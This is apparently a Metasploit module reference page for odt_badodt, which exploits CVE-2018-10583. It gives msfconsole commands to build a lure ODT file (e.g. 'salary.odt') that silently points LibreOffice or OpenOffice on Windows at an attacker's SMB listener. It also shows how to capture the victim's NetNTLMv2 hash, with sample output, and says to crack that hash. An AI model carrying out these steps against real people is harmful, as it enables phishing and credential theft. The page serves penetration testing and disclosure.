LibreOffice 6.03 /Apache OpenOffice 4.1.5 Malicious ODT File Generator - Metasploit


This page contains detailed information about how to use the auxiliary/fileformat/odt_badodt metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Table Of Contents
hide

Module Overview

Name: LibreOffice 6.03 /Apache OpenOffice 4.1.5 Malicious ODT File Generator
Module: auxiliary/fileformat/odt_badodt
Source code: modules/auxiliary/fileformat/odt_badodt.rb
Disclosure date: 2018-05-01
Last modification time: 2018-06-06 11:26:20 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2018-10583

Generates a Malicious ODT File which can be used with auxiliary/server/capture/smb or similar to capture hashes.

Module Ranking and Traits

Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage

msf > use auxiliary/fileformat/odt_badodt
msf auxiliary(odt_badodt) > show targets
    ... a list of targets ...
msf auxiliary(odt_badodt) > set TARGET target-id
msf auxiliary(odt_badodt) > show options
    ... show and set options ...
msf auxiliary(odt_badodt) > exploit

Knowledge Base

BADODT Module creates an ODT file which includes a file:// link which points back to a listening SMB capture server. This module has been tested on both LibreOffice 6.03 /Apache OpenOffice 4.1.5 and upon opening connects to the server without providing any warning to the user. This allows an attacker the opportunity to potentially steal NetNTLM hashes.

Vulnerable Application

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use auxiliary/fileformat/odt_badodt
  4. Customise Options as required
  5. Do: run
  6. A malicious document will then be generated.
  7. Configure auxiliary/server/capture/smb or similar to capture hashes.
  8. Send document to target and wait for them to open.

Options

CREATOR

This option allows you to customise the document author for the new document: set CREATOR New_User

FILENAME

This option allows you to customise the generated filename: set FILENAME salary.odt

LHOST

This option allows you to set the IP address of the SMB Listener that the .odt document points to:

set LISTENER 192.168.1.25

Scenarios

Install LibreOffice 6.03 or Apache OpenOffice 4.1.5 on a Windows workstation. (Note: This attack does not work against Mac or Linux versions.)

  msf5 > use auxiliary/fileformat/odt_badodt 
  msf5 auxiliary(fileformat/odt_badodt) > set FILENAME salary.odt
  FILENAME => salary.odt
  msf5 auxiliary(fileformat/odt_badodt) > set LHOST 192.168.1.25
  LHOST => 192.168.1.25
  msf5 auxiliary(fileformat/odt_badodt) > set CREATOR A_USER
  CREATOR => A_USER
  msf5 auxiliary(fileformat/odt_badodt) > exploit

  [*] Generating Malicious ODT File 
  [*] SMB Listener Address will be set to 192.168.1.25
  [+] salary.odt stored at /root/.msf4/local/salary.odt
  [*] Auxiliary module execution completed
  msf auxiliary(fileformat/odt_badodt) >

On an attacker workstation, use a tool to serve and capture an SMB share on port 445, capturing NTLM hashes. Note that any tool listening on :445 will require superuser permissions:

  $ sudo ./msfconsole
  msf5 > use auxiliary/server/capture/smb 
  msf5 auxiliary(server/capture/smb) > run
  [*] Auxiliary module running as background job 0.
  msf5 auxiliary(server/capture/smb) >
  [*] Server started.

  msf5 auxiliary(server/capture/smb) >

Leave the metasploit SMB server listening while the user opens the document. Upon opening the ODT file, the user workstation will attempt to connect (and authenticate) to the attacker workstation:

  [*] SMB Captured - 2018-06-06 11:14:23 -0500
  NTLMv2 Response Captured from 192.168.108.171:49180 - 192.168.108.171
  USER:asoto-r7 DOMAIN:WIN-TSD7B7BQKDQ OS: LM:
  LMHASH:Disabled
  LM_CLIENT_CHALLENGE:Disabled
  NTHASH:3910d841a30289ad9876e09321c1099a
  NT_CLIENT_CHALLENGE:0101000000000000a9d923e9f909391957581abc8d91038400000000020000000000000000000000

Finally, crack the hash to capture the user's credentials.

Go back to menu.

Msfconsole Usage

Here is how the fileformat/odt_badodt auxiliary module looks in the msfconsole:

msf6 > use auxiliary/fileformat/odt_badodt

msf6 auxiliary(fileformat/odt_badodt) > show info

       Name: LibreOffice 6.03 /Apache OpenOffice 4.1.5 Malicious ODT File Generator
     Module: auxiliary/fileformat/odt_badodt
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2018-05-01

Provided by:
  Richard Davy - secureyourit.co.uk

Check supported:
  No

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  CREATOR   RD_PENTEST       yes       Document author for new document
  FILENAME  bad.odt          yes       Filename for the new document
  LHOST                      yes       IP Address of SMB Listener that the .odt document points to

Description:
  Generates a Malicious ODT File which can be used with 
  auxiliary/server/capture/smb or similar to capture hashes.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2018-10583
  https://secureyourit.co.uk/wp/2018/05/01/creating-malicious-odt-files/

Module Options

This is a complete list of options available in the fileformat/odt_badodt auxiliary module:

msf6 auxiliary(fileformat/odt_badodt) > show options

Module options (auxiliary/fileformat/odt_badodt):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CREATOR   RD_PENTEST       yes       Document author for new document
   FILENAME  bad.odt          yes       Filename for the new document
   LHOST                      yes       IP Address of SMB Listener that the .odt document points to

Advanced Options

Here is a complete list of advanced options supported by the fileformat/odt_badodt auxiliary module:

msf6 auxiliary(fileformat/odt_badodt) > show advanced

Module advanced options (auxiliary/fileformat/odt_badodt):

   Name                   Current Setting  Required  Description
   ----                   ---------------  --------  -----------
   DisablePayloadHandler  true             no        Disable the handler code for the selected payload
   VERBOSE                false            no        Enable detailed status messages
   WORKSPACE                               no        Specify the workspace for this module

Auxiliary Actions

This is a list of all auxiliary actions that the fileformat/odt_badodt module can do:

msf6 auxiliary(fileformat/odt_badodt) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options

Here is the full list of possible evasion options supported by the fileformat/odt_badodt auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(fileformat/odt_badodt) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

References

See Also

Check also the following modules related to this module:

Related Nessus plugins:

Authors

Richard Davy - secureyourit.co.uk

Version

This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.